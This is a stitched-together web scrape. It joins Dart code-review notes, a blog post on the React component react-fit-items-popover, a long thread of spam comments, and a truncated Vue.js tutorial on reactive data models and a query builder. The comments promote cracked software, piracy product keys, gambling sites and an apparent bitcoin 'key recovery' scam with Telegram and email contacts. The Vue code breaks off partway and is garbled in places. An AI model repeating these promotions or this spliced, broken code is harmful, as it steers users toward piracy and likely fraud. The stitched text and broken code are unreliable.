<template> <div v- <h1>{{ post.title }}</h1> <span>Author: {{ post.authorFullName }}</span> <p> <template v- {{ post.body }} </template> <template v-else> {{ post.intro }} <button @ read more </button> </template> </p> </div> </template> <script> import { makePost } from '../models/post'; export default { name: 'BlogPost', data() { return { post: null, showBody: false, }; }, async created() { // Create a new post model and fetch // the first post where the `id` is `1`. this.post = await makePost({ words: 20 }) .where({ id: 1 }) .first(); }, }; </script>
This example is a simplified version for demonstration purposes. In a real application the
BlogPost component would take the
post as a required property so it doesn’t care if it is a static object or a reactive data model.
Wrapping it up
In the future, the reuse of computed properties can be easily achieved by using the Vue.js Composition API. But even then, I think it’s very valuable to add a layer of abstraction and not directly fetch data within your Vue.js components.
I think using data models can be a very elegant solution not only for reusing code, but also for decoupling your data fetching and rendering logic. If you use some form of dependency injection to make your models available to your components, you could even inject different implementations into different components (think of different computed properties for example). | https://markus.oberlehner.net/blog/vue-powered-data-model-and-query-builder/ | CC-MAIN-2019-47 | refinedweb | 1,152 | 59.3 |
New in the 2012 Advantage Pack: PPG logic for ICE compounds.
In the compound properties, there’s a PPG Logic button that opens up a script editor where you can define some PPG callbacks:
- OnInit is called when a user opens the PPG.
You can use this callback for initialization code, but you cannot define the PPG layout (eg add tabs, groups, or buttons). ICE has its own layout code and ignores any PPGLayout you might define.
- _OnChanged is called when a user changes a value in the PPG.
from siutils import log # LogMessage def OnInit( ): log("Modulate_by_Fcurve_OnInit called") oPPG = PPG oLayout = oPPG.PPGLayout # # Clamp exposed port # def Clamp_OnChanged(): log( PPG.Clamp.Value ) # # Input Range Start exposed port # def Input_Range_Start_OnChanged(): log( "Input Range = ( %.2f, %.2f )" % (PPG.Input_Range_Start.Value, PPG.Input_Range_End.Value ) ) # # Input Range End exposed port # def Input_Range_End_OnChanged(): log( "Input Range = ( %.2f, %.2f )" % (PPG.Input_Range_Start.Value, PPG.Input_Range_End.Value ) )
The “PPG logic” is saved in the element of the .xiscompound file. | http://xsisupport.com/2011/09/27/ | CC-MAIN-2015-27 | refinedweb | 161 | 64.91 |
Dynaconf
dynaconf - The dynamic configurator for your Python Project
dynaconf is an OSM (Object Settings Mapper) it can read settings variables from a set of different data stores such as python settings files, environment variables, redis, memcached, ini files, json files, yaml files and you can customize dynaconf loaders to read from wherever you want. (maybe you really want to read from xml files ughh?)
GITHUB REPO:
What is Dynaconf?
Dynaconf is a common point of access to settings variables, you import only one object in your project and from that object you can access settings variables from Python settings file, from environment variables, from parsed yaml, ini, json or xml files, from datastores as Redis and MongoDB or from wherever your need if you write a simple dynaconf loader.
How it works
Install it
pip install dynaconf
Use it
from dynaconf import settings print settings.SOME_VARIABLE or print settings.get('SOME_VARIABLE')
By default Dynaconf will try to use a file called
settings.py on the root of your project, if you place that file there all upper case variables will be read
You can also replace the file exporting an environment variable pointing to the module or location for the settings file.
# using module name export DYNACONF_SETTINGS=myproject.production_settings # or using location path export DYNACONF_SETTINGS=/etc/myprogram/settings.py
Doing that when you use
from dynaconf import settings the variables will be read from that file.
So how it is Dynamic?
Now think you have your program done and you want to deploy to a certain infrastructure for testing or maybe different deployment, you don't need to rewrite the settings file. Just export some variables to your environment.
export DYNACONF_MYSQL_HOST=myserver.com
Now in your project you can do:
from dynaconf import settings print settings.MYSQL_HOST myserver.com
The default prefix for exported envvars is by default DYNACONF_ but you also can change it if needed.
But what if I have some typed values to export?
You can also define type casting when exporting and those types will be used to parse the values.
export DYNACONF_NUMBER='@int 123' export DYNACONF_FLOAT='@float 12.2' export DYNACONF_FLAG='@bool yes' export DYNACONF_FLAG2='@bool disabled' export DYNACONF_LIST='@json [1, 2, 3, 4]' export DYNACONF_DICT='@json {"name": "Bruno"}'
Now you can read all those values from your project and it will be loaded with correct type casting.
from dynaconf import settings type(settings.NUMBER) int type(settings.FLOAT) float type(settings.FLAG) bool print settings.FLAG2 == False True print settings.LIST[1] 2 print settings.DICT['name'] Bruno
Nice! But I don't want to use envvars because I use autoscaling and I want my machines to share a settings environment how to do it?
Redis
Go to your settings file (default settings.py) and put
# connection REDIS_FOR_DYNACONF = { 'host': 'localhost', 'port': 6379, 'db': 0 } # and loader LOADERS_FOR_DYNACONF = [ 'dynaconf.loaders.env_loader', 'dynaconf.loaders.redis_loader' ]
Now you can store settings variables directly in Redis using a hash named by default DYNACONF_DYNACONF
If you don't want want to write directly you can use the Redis writer helper in a python REPL. (ipython as example)
from dynaconf.utils import redis_writer from dynaconf import settings redis_writer.write(settings, name='Bruno', mysql_host='localhost', MYSQL_PORT=1234)
And the above will be store in Redis as a hash int the form.
DYNACONF_DYNACONF: NAME='Bruno' MYSQL_HOST='localhost' PORT='@int 1234'
And of course you can now read those variables in the project, all the casting wildcards also works on Redis but if you want to skip type casting, write as string intead of PORT=1234 use PORT='1234' as redis stores everything as string anyway.
There is more
Dynaconf has support for using different namespaces in the same project, you can also write your own loaders, you can find more information on the repository
Contribute
All contributions are very welcome!!
Acknowledgements
Dynaconf was inspired by Flask app config and also by Django settings module. | http://brunorocha.org/python/dynaconf-let-your-settings-to-be-dynamic.html | CC-MAIN-2017-51 | refinedweb | 653 | 54.93 |
Welcome to the Java Scheduler Example. Today we will look into ScheduledExecutorService and its implementation class ScheduledThreadPoolExecutor with an example.
Java Scheduler ScheduledExecutorService
Sometimes we need to execute a task periodically or after a specific delay. Java provides the Timer class to achieve this, but sometimes we need to run similar tasks in parallel, and creating multiple Timer objects is an overhead on the system. It’s better to have a thread pool of scheduled tasks.
Java provides a scheduled thread pool implementation through the ScheduledThreadPoolExecutor class, which implements the ScheduledExecutorService interface. ScheduledExecutorService defines the contract methods to schedule a task with different options.
Sometime back I wrote a post about Java ThreadPoolExecutor where I was using the Executors class to create the thread pool. The Executors class also provides factory methods to create a ScheduledThreadPoolExecutor where we can specify the number of threads in the pool.
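Before moving to the full example, here is a minimal self-contained sketch of that basic contract in action (the two-thread pool, the 100 ms delay, and the value 42 are arbitrary choices for this sketch): we schedule a Callable and block on the returned future until the delayed task has produced its result.

```java
import java.util.concurrent.*;

public class BasicScheduleDemo {

    // Schedules a Callable to run after a short delay and blocks for its result.
    // Returns -1 if the wait is interrupted or the task fails.
    static int delayedAnswer() {
        ScheduledExecutorService ses = Executors.newScheduledThreadPool(2);
        try {
            // schedule(Callable, delay, unit) returns a typed ScheduledFuture<V>
            ScheduledFuture<Integer> future =
                    ses.schedule(() -> 42, 100, TimeUnit.MILLISECONDS);
            return future.get(); // blocks until the delayed task has run
        } catch (InterruptedException | ExecutionException e) {
            return -1;
        } finally {
            ses.shutdown();
        }
    }

    public static void main(String[] args) {
        System.out.println("Answer = " + delayedAnswer()); // prints "Answer = 42"
    }
}
```

Because the schedule() overload that takes a Callable returns a typed ScheduledFuture&lt;V&gt;, the result of a delayed computation can be retrieved with a plain get() call.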
Java Scheduler Example
Let’s say we have a simple Runnable class like below.
WorkerThread.java
package com.journaldev.threads;

import java.util.Date;

public class WorkerThread implements Runnable {

    private String command;

    public WorkerThread(String s) {
        this.command = s;
    }

    @Override
    public void run() {
        System.out.println(Thread.currentThread().getName() + " Start. Time = " + new Date());
        processCommand();
        System.out.println(Thread.currentThread().getName() + " End. Time = " + new Date());
    }

    private void processCommand() {
        try {
            Thread.sleep(5000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String toString() {
        return this.command;
    }
}
It’s a simple Runnable class that takes around 5 seconds to execute its task.
Let’s see a simple example where we will schedule the worker thread to execute after a 10-second delay. We will use the Executors class newScheduledThreadPool(int corePoolSize) method, which returns an instance of ScheduledThreadPoolExecutor. Here is the code snippet from the Executors class.
public static ScheduledExecutorService newScheduledThreadPool(int corePoolSize) {
    return new ScheduledThreadPoolExecutor(corePoolSize);
}
Below is our Java scheduler example program using ScheduledExecutorService and the ScheduledThreadPoolExecutor implementation.
package com.journaldev.threads;

import java.util.Date;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;

public class ScheduledThreadPool {

    public static void main(String[] args) throws InterruptedException {
        ScheduledExecutorService scheduledThreadPool = Executors.newScheduledThreadPool(5);

        // schedule to run after sometime
        System.out.println("Current Time = " + new Date());
        for (int i = 0; i < 3; i++) {
            Thread.sleep(1000);
            WorkerThread worker = new WorkerThread("do heavy processing");
            scheduledThreadPool.schedule(worker, 10, TimeUnit.SECONDS);
        }

        // add some delay to let some threads spawn by scheduler
        Thread.sleep(30000);

        scheduledThreadPool.shutdown();
        while (!scheduledThreadPool.isTerminated()) {
            // wait for all tasks to finish
        }
        System.out.println("Finished all threads");
    }
}
When we run the above Java scheduler example program, we get the following output, which confirms that the tasks are running with a 10-second delay.
Current Time = Tue Oct 29 15:10:03 IST 2013
pool-1-thread-1 Start. Time = Tue Oct 29 15:10:14 IST 2013
pool-1-thread-2 Start. Time = Tue Oct 29 15:10:15 IST 2013
pool-1-thread-3 Start. Time = Tue Oct 29 15:10:16 IST 2013
pool-1-thread-1 End. Time = Tue Oct 29 15:10:19 IST 2013
pool-1-thread-2 End. Time = Tue Oct 29 15:10:20 IST 2013
pool-1-thread-3 End. Time = Tue Oct 29 15:10:21 IST 2013
Finished all threads
Note that all the
schedule() methods return an instance of
ScheduledFuture, which we can use to get the thread’s state information and the remaining delay time for the task.
ScheduledFuture extends the Future interface; read more about them in the Java Callable Future example.
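For example (a quick sketch added here, not from the original article): the returned ScheduledFuture can report how long remains before the task runs, and can cancel it while it is still pending.

```java
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.TimeUnit;

public class ScheduledFutureDemo {
    public static void main(String[] args) {
        ScheduledExecutorService pool = Executors.newScheduledThreadPool(1);
        ScheduledFuture<?> future = pool.schedule(() -> { }, 10, TimeUnit.SECONDS);

        // getDelay() counts down towards zero as the scheduled time approaches
        System.out.println("Runs in ~" + future.getDelay(TimeUnit.SECONDS) + "s");

        // The task has not started yet, so it can still be cancelled
        System.out.println("Cancelled: " + future.cancel(false));
        pool.shutdown();
    }
}
```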
There are two more methods in ScheduledExecutorService that provide the option to schedule a task to run periodically.
ScheduledExecutorService scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit)
We can use the scheduleAtFixedRate method to schedule a task to run after an initial delay and then repeatedly with the given period.
The period is measured between the start times of successive executions, but executions never overlap: if you specify a period of 1 second and your task runs for 5 seconds, the next execution starts as soon as the previous one finishes.
For example, if we have code like this:
for (int i = 0; i < 3; i++) {
    Thread.sleep(1000);
    WorkerThread worker = new WorkerThread("do heavy processing");
    // schedule task to execute at fixed rate
    scheduledThreadPool.scheduleAtFixedRate(worker, 0, 10, TimeUnit.SECONDS);
}
Then we will get output like below.
Current Time = Tue Oct 29 16:10:00 IST 2013
pool-1-thread-1 Start. Time = Tue Oct 29 16:10:01 IST 2013
pool-1-thread-2 Start. Time = Tue Oct 29 16:10:02 IST 2013
pool-1-thread-3 Start. Time = Tue Oct 29 16:10:03 IST 2013
pool-1-thread-1 End. Time = Tue Oct 29 16:10:06 IST 2013
pool-1-thread-2 End. Time = Tue Oct 29 16:10:07 IST 2013
pool-1-thread-3 End. Time = Tue Oct 29 16:10:08 IST 2013
pool-1-thread-1 Start. Time = Tue Oct 29 16:10:11 IST 2013
pool-1-thread-4 Start. Time = Tue Oct 29 16:10:12 IST 2013
ScheduledExecutorService scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit)
The scheduleWithFixedDelay method can be used to start periodic execution after an initial delay, with the given delay between executions. The delay is measured from the time each execution finishes. So if we have code like below:
for (int i = 0; i < 3; i++) {
    Thread.sleep(1000);
    WorkerThread worker = new WorkerThread("do heavy processing");
    scheduledThreadPool.scheduleWithFixedDelay(worker, 0, 1, TimeUnit.SECONDS);
}
Then we will get output like below.
Current Time = Tue Oct 29 16:14:13 IST 2013
pool-1-thread-1 Start. Time = Tue Oct 29 16:14:14 IST 2013
pool-1-thread-2 Start. Time = Tue Oct 29 16:14:15 IST 2013
pool-1-thread-3 Start. Time = Tue Oct 29 16:14:16 IST 2013
pool-1-thread-1 End. Time = Tue Oct 29 16:14:19 IST 2013
pool-1-thread-2 End. Time = Tue Oct 29 16:14:20 IST 2013
pool-1-thread-1 Start. Time = Tue Oct 29 16:14:20 IST 2013
pool-1-thread-3 End. Time = Tue Oct 29 16:14:21 IST 2013
pool-1-thread-4 Start. Time = Tue Oct 29 16:14:21 IST 2013
That’s all for the Java scheduler example. We learned about ScheduledExecutorService and ScheduledThreadPoolExecutor too. You should check out the other articles about multithreading in Java.
My desktop application hangs after 2 hours; is there any bug in the following code?
Please guide me.
ScheduledExecutorService executor = Executors.newScheduledThreadPool(1);
final Runnable beeper = new Runnable() {
public void run() {
//new kotprint();
//new DinaUtil().updatetablestatus();
System.out.println("beep" + util.gettimewithss());
}
};
executor.scheduleAtFixedRate(beeper, 10, 10, TimeUnit.SECONDS);
Can the schedule() method trigger a task a little earlier than the scheduled time?
In my case, a task should be triggered at 11:00 am, but it is being triggered at 10:59:48 am. In fact, the early trigger time varies between 1 and 12 seconds.
I am having the same issue.
My tasks are supposed to start at midnight. The first time it was OK, but the second time it started the task 2 seconds early, at 23:59:58.
How to schedule cron jobs using cron expressions in Java? I don’t want to use quartz or other third party libraries.
How should I kill the threads after they finish their tasks? I am working with the Quartz scheduler.
Very nice article.
Is there any way to verify whether the invoked thread is finished or not? If the invoked thread is taking more than the expected time, I want to kill the thread and continue.
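One common pattern (a sketch added here, not an answer from the thread, and note it relies on the task responding to interruption): submit the task, wait on its Future with a timeout, and cancel it if the timeout expires.

```java
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;

public class TimeoutCancel {

    // Returns true if the task finished within the timeout, false if it was cancelled.
    public static boolean runWithTimeout(ExecutorService pool, Runnable task, long timeoutMillis) {
        Future<?> future = pool.submit(task);
        try {
            future.get(timeoutMillis, TimeUnit.MILLISECONDS);
            return true;
        } catch (TimeoutException e) {
            future.cancel(true); // interrupts the worker thread; the task must honour interruption
            return false;
        } catch (InterruptedException | ExecutionException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        ExecutorService pool = Executors.newFixedThreadPool(1);
        boolean fast = runWithTimeout(pool, () -> { }, 2000);
        boolean slow = runWithTimeout(pool, () -> {
            try {
                Thread.sleep(5000);
            } catch (InterruptedException e) {
                // interrupted by cancel(true): clean up and exit
            }
        }, 100);
        System.out.println("fast finished: " + fast + ", slow finished: " + slow);
        pool.shutdownNow();
    }
}
```

A task that ignores interruption cannot be forcibly killed this way; the cancel only works if the task checks its interrupt status or blocks on an interruptible call.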
Congratulations on your article. I found it very useful. I just have a question: how can I schedule multiple different tasks at different hours of the day, such as:
task 1: 7 am : “have breakfast”;
task 2: 8 am : “go to work”;
task 3: 1 pm: “have lunch”;
task 4: 6 pm: “go home”
task 5: 7 pm: “have dinner”
task 6: 9 pm: “go to sleep”
What is the best solution to come up with an app that prints out these messages at these particular times of the day?
Thank you in advance,
Kind regards,
Fábio. | https://www.journaldev.com/2340/java-scheduler-scheduledexecutorservice-scheduledthreadpoolexecutor-example | CC-MAIN-2021-04 | refinedweb | 1,362 | 59.5 |
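One approach (a sketch added here, not an official answer from the article): for each message, compute the delay from now until the next occurrence of its time of day, then schedule it with scheduleAtFixedRate and a 24-hour period.

```java
import java.time.Duration;
import java.time.LocalDateTime;
import java.time.LocalTime;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;

public class DailyScheduler {

    // Seconds from 'now' until the next occurrence of 'target' (today, or tomorrow if already past).
    static long secondsUntil(LocalDateTime now, LocalTime target) {
        LocalDateTime next = now.toLocalDate().atTime(target);
        if (!next.isAfter(now)) {
            next = next.plusDays(1);
        }
        return Duration.between(now, next).getSeconds();
    }

    public static void main(String[] args) {
        ScheduledExecutorService pool = Executors.newScheduledThreadPool(2);
        LocalDateTime now = LocalDateTime.now();
        String[][] plan = {
            {"07:00", "have breakfast"}, {"08:00", "go to work"},
            {"13:00", "have lunch"},     {"18:00", "go home"},
            {"19:00", "have dinner"},    {"21:00", "go to sleep"}
        };
        for (String[] entry : plan) {
            long delay = secondsUntil(now, LocalTime.parse(entry[0]));
            String message = entry[1];
            // first run after 'delay', then repeat every 24 hours
            pool.scheduleAtFixedRate(() -> System.out.println(message),
                    delay, TimeUnit.DAYS.toSeconds(1), TimeUnit.SECONDS);
        }
        // In a real app the pool would stay alive; shut down here only so the demo exits.
        pool.shutdownNow();
    }
}
```

Note that scheduleAtFixedRate drifts across daylight-saving changes; for calendar-accurate scheduling, reschedule each task after it runs, or use a cron-style library.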
UDP-Communication [SOLVED]
After a little bit of searching I found a solution for UDP communication (sending & receiving).
I found a very simple solution at
and modified it a "little bit" for more flexibility ..
Some remarks:
- the code works ONLY in a UWP app (Unity) - on HoloLens and PC - not in the Unity editor!
- for testing the communication I used
UDPCommunication.cs
using UnityEngine;
using System;
using System.IO;
using System.Text;
using System.Linq;
using HoloToolkit.Unity;
using System.Collections.Generic;
using UnityEngine.Events;

#if !UNITY_EDITOR
using Windows.Networking.Sockets;
using Windows.Networking.Connectivity;
using Windows.Networking;
#endif

[System.Serializable]
public class UDPMessageEvent : UnityEvent<string, string, byte[]> { }

public class UDPCommunication : Singleton<UDPCommunication>
{
    [Tooltip("port to listen for incoming data")]
    public string internalPort = "12345";

    [Tooltip("IP-Address for sending")]
    public string externalIP = "192.168.17.110";

    [Tooltip("Port for sending")]
    public string externalPort = "12346";

    [Tooltip("Send a message at Startup")]
    public bool sendPingAtStart = true;

    [Tooltip("Content of Ping")]
    public string PingMessage = "hello";

    [Tooltip("Function to invoke at incoming packet")]
    public UDPMessageEvent udpEvent = null;

    private readonly Queue<Action> ExecuteOnMainThread = new Queue<Action>();

#if !UNITY_EDITOR
    // we've got a message (data[]) from (host) in case of not assigned an event
    void UDPMessageReceived(string host, string port, byte[] data)
    {
        Debug.Log("GOT MESSAGE FROM: " + host + " on port " + port + " " + data.Length.ToString() + " bytes ");
    }

    // Send an UDP-Packet
    public async void SendUDPMessage(string HostIP, string HostPort, byte[] data)
    {
        await _SendUDPMessage(HostIP, HostPort, data);
    }

    DatagramSocket socket;

    async void Start()
    {
        if (udpEvent == null)
        {
            udpEvent = new UDPMessageEvent();
            udpEvent.AddListener(UDPMessageReceived);
        }

        Debug.Log("Waiting for a connection...");

        socket = new DatagramSocket();
        socket.MessageReceived += Socket_MessageReceived;

        HostName IP = null;
        try
        {
            var icp = NetworkInformation.GetInternetConnectionProfile();
            IP = Windows.Networking.Connectivity.NetworkInformation.GetHostNames()
                .SingleOrDefault(
                    hn => hn.IPInformation?.NetworkAdapter != null
                       && hn.IPInformation.NetworkAdapter.NetworkAdapterId == icp.NetworkAdapter.NetworkAdapterId);

            await socket.BindEndpointAsync(IP, internalPort);
        }
        catch (Exception e)
        {
            Debug.Log(e.ToString());
            Debug.Log(SocketError.GetStatus(e.HResult).ToString());
            return;
        }

        if (sendPingAtStart)
            SendUDPMessage(externalIP, externalPort, Encoding.UTF8.GetBytes(PingMessage));
    }

    private async System.Threading.Tasks.Task _SendUDPMessage(string externalIP, string externalPort, byte[] data)
    {
        using (var stream = await socket.GetOutputStreamAsync(new Windows.Networking.HostName(externalIP), externalPort))
        {
            using (var writer = new Windows.Storage.Streams.DataWriter(stream))
            {
                writer.WriteBytes(data);
                await writer.StoreAsync();
            }
        }
    }
#else
    // to make Unity-Editor happy :-)
    void Start() { }

    public void SendUDPMessage(string HostIP, string HostPort, byte[] data) { }
#endif

    static MemoryStream ToMemoryStream(Stream input)
    {
        try
        {
            // Read and write in blocks of 4K.
            byte[] block = new byte[0x1000];
            MemoryStream ms = new MemoryStream();
            while (true)
            {
                int bytesRead = input.Read(block, 0, block.Length);
                if (bytesRead == 0) return ms;
                ms.Write(block, 0, bytesRead);
            }
        }
        finally { }
    }

    // Update is called once per frame
    void Update()
    {
        while (ExecuteOnMainThread.Count > 0)
        {
            ExecuteOnMainThread.Dequeue().Invoke();
        }
    }

#if !UNITY_EDITOR
    private void Socket_MessageReceived(Windows.Networking.Sockets.DatagramSocket sender,
        Windows.Networking.Sockets.DatagramSocketMessageReceivedEventArgs args)
    {
        Debug.Log("GOT MESSAGE FROM: " + args.RemoteAddress.DisplayName);

        // Read the message that was received from the UDP client.
        Stream streamIn = args.GetDataStream().AsStreamForRead();
        MemoryStream ms = ToMemoryStream(streamIn);
        byte[] msgData = ms.ToArray();

        if (ExecuteOnMainThread.Count == 0)
        {
            ExecuteOnMainThread.Enqueue(() =>
            {
                Debug.Log("ENQUEUED ");
                if (udpEvent != null)
                    udpEvent.Invoke(args.RemoteAddress.DisplayName, internalPort, msgData);
            });
        }
    }
#endif
}
Assign this script to an (empty) GameObject, set the properties and assign a UnityEvent to UdpEvent ... like this:
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

public class UDPResponse : MonoBehaviour
{
    public TextMesh tm = null;

    public void ResponseToUDPPacket(string incomingIP, string incomingPort, byte[] data)
    {
        if (tm != null)
            tm.text = System.Text.Encoding.UTF8.GetString(data);

#if !UNITY_EDITOR
        // ECHO
        UDPCommunication comm = UDPCommunication.Instance;
        comm.SendUDPMessage(incomingIP, comm.externalPort, data);
#endif
    }
}
Any comments and/or modifications are welcome !
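For the PC end of a quick test, any UDP tool works; a minimal Python echo peer (my addition, not the tool the author used) mirrors what the UDPResponse.cs echo above does:

```python
import socket

def udp_echo_once(listen_port, timeout=5.0):
    """Wait for one datagram on listen_port and echo it back to the sender."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.bind(("0.0.0.0", listen_port))
    try:
        data, addr = sock.recvfrom(4096)
        sock.sendto(data, addr)  # echo, mirroring the HoloLens-side script
        return data, addr
    finally:
        sock.close()
```

Run it on the PC with the same port the HoloLens app sends to, and you should see your ping come straight back.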
Hi! I was wondering what latency you get with this implementation? Thanks!
Hey DrNeurosurg! Great work.
I have prior exposure to serial comms, but not over IP.
Just for clarification: UDPCommunication.cs gets assigned to an empty GameObject to be run in a UWP app on the computer, and UDPResponse.cs gets assigned to an empty GameObject to be run in a UWP app on the HoloLens (just to echo back)?
Please correct me if I'm wrong.
@JKukulsky:
No - in the HoloLens UWP app, assign UDPCommunication.cs to an empty GameObject and also assign UDPResponse.cs to the same or a different GameObject ...
It's both for receiving.
If you want to send from a Unity UWP desktop PC app, you only need to assign UDPCommunication.cs to a GameObject...
I'll post a GitHub link to both examples shortly ...
@DrNeurosurg
How would you use this to control a game object using the message received from a udp server?
This does not work properly.
Weirdly, the HoloLens will only be able to receive UDP messages from externalIP after it does SendUDPMessage(externalIP, externalPort, Encoding.UTF8.GetBytes(PingMessage));
Somehow it does not listen like a UDP server. It needs to send to a server (externalIP) first, then wait to receive messages.
I tried out the scripts here on HoloLens and they do not work for a typical UDP server either.
Anyone have insights?
Thanks!
@DrNeurosurg have you posted your example to the GitHub link? Thank you.
Can we get some official word from Microsoft on this? It is so weird that the HoloLens doesn't listen to UDP packets. This should not depend on the implementation at the application layer. It should listen to UDP, period. What is going on?
Got to be patient .... or wait for Hololens 2 ?
nice
Doesn't work for me. Microsoft, this is on you. I have client projects currently stalled because of this thing. How can a 2016 device NOT work with UDP? I'm not sure if I should cry or laugh at this.
I have done complete testing and it works fine in a standalone UWP app, and it works fine in other settings like mobile - just not the HoloLens.
So much for UWP.
Yeah that doesn't fly with clients though. And the rest of the internet. UDP is not something new.
Hi everyone, this code works very well. Sincere thanks to DrNeurosurg. I was able to use it to receive information from a UDP server (that I programmed in Ubuntu) to overlay body-pose estimation on people in near real time; check out the video here (> 1 min 22 s):
Hi summerIntern: by 'this code' do you mean the code pasted in this thread above? Or some other code you worked on? Any tips?
Yes - @DrNeurosurg did; see the DrNeuroSurg GitHub repositories.
I have this code working on a PC. I use the sharing service to communicate with the HoloLenses and this code to communicate with other stuff. Thanks for sharing this code.
I'm unsure whether this might help this thread, but it's part of the set of experimental blog posts that I wrote, which started here:
I wrote a small UDP multicasting library to send/receive small messages between HoloLens devices.
I also wrote a console-based test application and a 2D UWP XAML based test application for that library.
That library and those apps seem to work OK for me when running HoloLens<->PC, although I will flag that sometimes the HoloLens doesn't seem to pick up messages from the PC and I find I have to reboot the device to clear that problem - although I'm not 100% sure that it isn't my code failing to do the right things with respect to timeouts on sockets.
Regardless...I thought I'd add this info to this thread in case any of that helps with some of the UDP explorations that people are making.
As an aside, the blog posts go on to build on top of this library but the first post only points to the library itself so that might be relevant here around UDP.
Because I failed to use this program: does anybody know how to set "externalIP"? Is it the IP of my computer?
@DrNeurosurg @JeffGullicksen I got a version of this solution working one-way (HoloLens -> PC), but I can't seem to send anything from PC -> HoloLens; it's driving me nuts. Would anyone be kind enough to share a working example of this code?
Hi, thanks for sharing.
I'm able to receive a webcam stream on my HoloLens, but I have a memory-leak problem. Did you have it too?
If nothing passes over UDP, the memory is stable; when I turn on the UDP sender (a smartphone), the memory increases, and I have only the UDPCommunication in my scene.
Where could I add something to free the memory?
Thanks
UPDATE: I saw that the line that increases the memory usage of the HoloLens when I receive data is this one:
Stream streamIn = args.GetDataStream().AsStreamForRead();
Why should it increase constantly? I'm using GC.Collect() every 10 seconds, but nothing happens to the memory, unfortunately.
Please help.
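Not from the thread, but one likely culprit worth checking (an untested sketch against the script above, since this only runs on the UWP platform): in Socket_MessageReceived neither the input stream nor the MemoryStream is ever disposed, so each received packet holds on to its buffers until finalization. Wrapping both in using blocks releases them deterministically:

```csharp
// Hypothetical replacement for Socket_MessageReceived in UDPCommunication.cs above
private void Socket_MessageReceived(Windows.Networking.Sockets.DatagramSocket sender,
    Windows.Networking.Sockets.DatagramSocketMessageReceivedEventArgs args)
{
    byte[] msgData;
    using (Stream streamIn = args.GetDataStream().AsStreamForRead())
    using (MemoryStream ms = new MemoryStream())
    {
        streamIn.CopyTo(ms);   // same copy as ToMemoryStream, but both streams are disposed below
        msgData = ms.ToArray();
    }
    // ... enqueue msgData for the main thread exactly as before ...
}
```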
@DrNeurosurg Thanks for your post. In my application, I need to send a picture from the HoloLens to a PC for processing and then send the result back to the HoloLens. I am really new to this; could you please let me know how I should modify the code?
Python Programming, news on the Voidspace Python Projects and all things techie.
Static Members on Classes
The .NET framework has static members on classes. These are effectively class attributes that behave like properties.
For example, the DateTime class (actually a .NET structure) has a static member Now that returns the current time. Not only is this very useful, but it makes code that uses it very clean.
>>> DateTime.Now
<System.DateTime object at 0x... [12/10/2007 10:24:49]>
>>>
I was thinking about how you could provide the same API from Python. We could implement this behaviour on an instance by using a property. However, when you access a property on the class you just get a reference to the property object.
>>> class Something(object):
...     @property
...     def thing(self):
...         print 'triggered'
...
>>> Something.thing
<property object at 0x009D6FA8>
>>>
So, to do this from Python we need a property on the class of the class - which is a metaclass.
Below is an example that provides a 'current' property on the Python datetime class. (I didn't use now as this is already a class method that does the same thing).
from datetime import datetime

class meta_datetime(type):
    @property
    def current(self):
        return new_datetime.now()

class new_datetime(datetime):
    __metaclass__ = meta_datetime
>>> new_datetime.current
2007-10-12 10:28:12.015000
>>>
Nice.
Of course by using a metaclass, you make your own code a bit more obscure [1]. You have to weigh up the balance between keeping your own code readable (by others), and presenting the nicest possible API.
Update
A commenter on my blog (Frank Benkstein, I think) suggests the following improvement using the descriptor protocol:
class current_datetime(object):
    def __get__(self, instance, owner):
        return owner.now()

class new_datetime(datetime):
    current = current_datetime()
>>> new_datetime.current
new_datetime(2007, 10, 12, 18, 27, 57, 748366)
I think this is more readable than the metaclass solution.
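A reusable variant of the same idea (my sketch, not from the post): a small generic "classproperty" descriptor, so any class-level getter can be attached without writing a new descriptor class each time.

```python
from datetime import datetime

class classproperty(object):
    """Read-only property that also works when accessed on the class itself."""
    def __init__(self, getter):
        self.getter = getter

    def __get__(self, instance, owner):
        # 'owner' is always the class, so this works on the class and on instances
        return self.getter(owner)

class new_datetime(datetime):
    current = classproperty(lambda cls: cls.now())
```

Accessing new_datetime.current (or instance.current) then returns a fresh new_datetime each time.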
Posted by Fuzzyman on 2007-10-12 10:49:32
Categories: Python, IronPython, Hacking
Resolver Open Source Project: CPython Extensions from IronPython
Yesterday we had a London Python meetup at Thoughtworks (free beer and Pizza - thanks guys), organised by Simon Brunning. It was nice to catch up with people again, including Remi Delon who I haven't seen for way too long. He promises exciting new changes at Webfaction (extra processes and memory on all hosting accounts, new website etc) as soon as his business partner gets back from holiday and they can roll it out!
More exciting was the talk that my boss Giles gave about Resolver Systems. We've found interest in Resolver has come from an unexpectedly diverse range of industries, some from Financial Services (including our current customers), but also interest from genetics companies, and even people doing oil exploration and games development! A lot of them are using Python for working with data, and feel the pain of Excel a great deal. For them, Resolver seems like a ready made solution, but it means that Resolver playing well with CPython is becoming important far more quickly than we expected.
Giles has announced that Resolver will begin work on an Open Source project to get some CPython extensions working seamlessly with IronPython. We may well start with some part of the Scipy Suite. It will be a .NET integration layer allowing you to use the existing Windows CPython extensions (so it is not a port to C#), and Python code that uses these extensions will run unchanged on CPython and IronPython.
The hope is that after doing the work to get a couple of extensions working, we will basically have created a general solution, but we're not promising that yet.
We think that as well as providing business value to us, this is a great way for Resolver to contribute back to the Python community. We don't have a timescale, but it is important to us. And yes, we do want your help.
We know that it is a big job, but we also know that it isn't impossible. Seo has already done some work (basic proof of concept) on a 'ctypes-reflector' that can call into CPython extensions from .NET. This is also essentially a 'solved problem', but from the other way round, with Python.NET.
Posted by Fuzzyman on 2007-10-11 11:45:52
Categories: Python, IronPython, Hacking, Work
iPhone Irony
